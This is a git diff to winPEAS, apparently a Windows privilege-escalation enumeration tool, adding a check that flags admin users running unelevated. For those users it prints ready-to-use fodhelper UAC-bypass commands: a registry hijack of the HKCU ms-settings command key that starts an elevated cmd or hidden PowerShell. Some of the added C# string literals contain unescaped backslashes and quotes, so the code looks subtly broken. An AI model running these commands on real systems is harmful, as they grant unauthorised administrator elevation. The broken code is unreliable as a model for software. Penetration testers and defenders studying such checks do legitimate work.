diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md index 5421493..c0aaa3b 100755 --- a/winPEAS/winPEASexe/README.md +++ b/winPEAS/winPEASexe/README.md @@ -135,6 +135,7 @@ Once you have installed and activated it you need to: - [x] AV - [x] Windows Defender - [x] UAC configuration + - [x] UAC bypass hints (fodhelper) when user is in Administrators but not elevated - [x] NTLM Settings - [x] Local Group Policy - [x] Applocker Configuration & bypass suggestions diff --git a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs index a5c5935..5a9bc2c 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs @@ -547,6 +547,71 @@ namespace winPEAS.Checks if ((uacDict["EnableLUA"] == "1") && (uacDict["LocalAccountTokenFilterPolicy"] != "1") && (uacDict["FilterAdministratorToken"] == "1")) Beaprint.GoodPrint(" [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken == 1.\r\n [-] No local accounts can be used for lateral movement."); + + // Extra UAC bypass hints (fodhelper) when user is admin but token is not elevated + try + { + bool isElevated = MyUtils.IsHighIntegrity(); + + // Detect if current user token contains any indication of local Administrators membership + bool inAdministrators = false; + foreach (var sid in Checks.CurrentUserSiDs) + { + if (sid.Key == "S-1-5-32-544" || sid.Value.Equals("Administrators", System.StringComparison.OrdinalIgnoreCase) || sid.Key == "S-1-5-114") + { + inAdministrators = true; + break; + } + } + + if (inAdministrators && !isElevated) + { + // Typical scenario for an easy UAC bypass such as fodhelper + Beaprint.BadPrint(" [!] Current user belongs to Administrators but the process is not elevated (Medium integrity). A UAC bypass may be possible (e.g., fodhelper)."); + + // Environment/arch info to guide Sysnative usage + bool isWow64 = !System.Environment.Is64BitProcess && System.Environment.Is64BitOperatingSystem; + string windir = System.Environment.GetEnvironmentVariable("windir") ?? "C\\Windows"; + string fodhelper = System.IO.Path.Combine(windir, "System32", "fodhelper.exe"); + bool fodExists = System.IO.File.Exists(fodhelper); + + Beaprint.NoColorPrint($" OS Arch: {(System.Environment.Is64BitOperatingSystem ? "x64" : "x86")} | Proc Arch: {(System.Environment.Is64BitProcess ? "x64" : "x86")}"); + Beaprint.NoColorPrint($" fodhelper.exe: {(fodExists ? fodhelper : "Not found in System32")}"); + + // Check if ms-settings hijack keys already exist in HKCU + string hijackKey = @"Software\\Classes\\ms-settings\\Shell\\Open\\command"; + string delExec = RegistryHelper.GetRegValue("HKCU", hijackKey, "DelegateExecute"); + string defaultCmd = RegistryHelper.GetRegValue("HKCU", hijackKey, ""); + if (!string.IsNullOrEmpty(delExec) || !string.IsNullOrEmpty(defaultCmd)) + { + Beaprint.InfoPrint(" Note: HKCU ms-settings hijack key already exists. Review current values before using:"); + Beaprint.NoColorPrint($" DelegateExecute: '{delExec}'"); + Beaprint.NoColorPrint($" (default): '{defaultCmd}'"); + } + + // Provide actionable, architecture-aware commands + string reg = isWow64 ? "%windir%\\Sysnative\\reg.exe" : "reg.exe"; + string fodLaunch = isWow64 ? "%windir%\\Sysnative\\fodhelper.exe" : "%windir%\\System32\\fodhelper.exe"; + string cmdPath = "%windir%\\System32\\cmd.exe"; + string ps64 = isWow64 ? "%windir%\\Sysnative\\WindowsPowerShell\\v1.0\\powershell.exe" : "%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"; + + Beaprint.LinkPrint("https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#uac-bypass-fodhelper", "fodhelper HKCU hijack quick commands"); + Beaprint.NoColorPrint(" Example (elevated cmd):"); + Beaprint.NoColorPrint(" " + reg + " add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f"); + Beaprint.NoColorPrint(" " + reg + " add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /ve /t REG_SZ /d \"" + cmdPath + " /c start " + cmdPath + "\" /f"); + Beaprint.NoColorPrint($" {fodLaunch}"); + Beaprint.NoColorPrint(" Example (elevated PowerShell):"); + Beaprint.NoColorPrint(" " + reg + " add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f"); + Beaprint.NoColorPrint(" " + reg + " add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /ve /t REG_SZ /d \"" + ps64 + " -NoP -W Hidden -Command \\\"\\\"Start-Process " + ps64 + " -Verb runAs\\\"\\\"\" /f"); + Beaprint.NoColorPrint($" {fodLaunch}"); + Beaprint.NoColorPrint(" Cleanup:"); + Beaprint.NoColorPrint(" reg delete HKCU\\Software\\Classes\\ms-settings /f"); + } + } + catch (System.Exception ex2) + { + Beaprint.GrayPrint(" (UAC extra hints) " + ex2.Message); + } } catch (Exception ex) {